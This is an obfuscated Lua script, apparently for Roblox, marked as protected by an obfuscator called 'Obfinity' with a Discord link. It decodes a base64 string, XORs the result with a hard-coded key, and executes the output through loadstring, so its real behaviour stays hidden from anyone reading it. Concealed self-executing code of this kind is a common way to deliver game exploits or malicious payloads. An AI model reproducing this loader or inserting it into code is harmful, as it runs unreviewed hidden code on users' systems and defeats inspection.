-- This script was secured by Obfinity [[-- https://discord.gg/nbA8kZCRft --]]
local NSaxGqIT="f2ASVq(;5{_&W*p]"
local eZQzHJbl=6347
local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
local function base64decode(data)
    data=string.gsub(data,'[^'..b..'=]','')
    return (data:gsub('.',function(x)
        if x=='=' then return '' end
        local r,f='',(b:find(x)-1)
        for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 and '1' or '0') end
        return r
    end):gsub('%d%d%d?%d?%d?%d?%d?%d?',function(x)
        if #x~=8 then return '' end
        local c=0
        for i=1,8 do c=c+(x:sub(i,i)=='1' and 2^(8-i) or 0) end
        return string.char(c)
    end))
end
local function xnofaNNU(s,k)
    local r=""
    for i=1,#s do
        r=r..string.char(bit32.bxor(s:byte(i),k:byte((i-1)%#k+1)))
    end
    return r
end
local BXRqYCMB="Cl0gNyUFWlJbHHdBNkcVZy5GNSMRFAAZXQ8rViQQX3IUUzZ9MRhcU0AZKlUyWBMyCEYkPSJfS1RYVGtBMkQEKUl1Lj8yFEZ6Ww82ajhJG3IUVycgeRlNWlEIcEs2Qx5yJ2Zjen9ZAQ=="
loadstring(xnofaNNU(base64decode(BXRqYCMB),NSaxGqIT))()
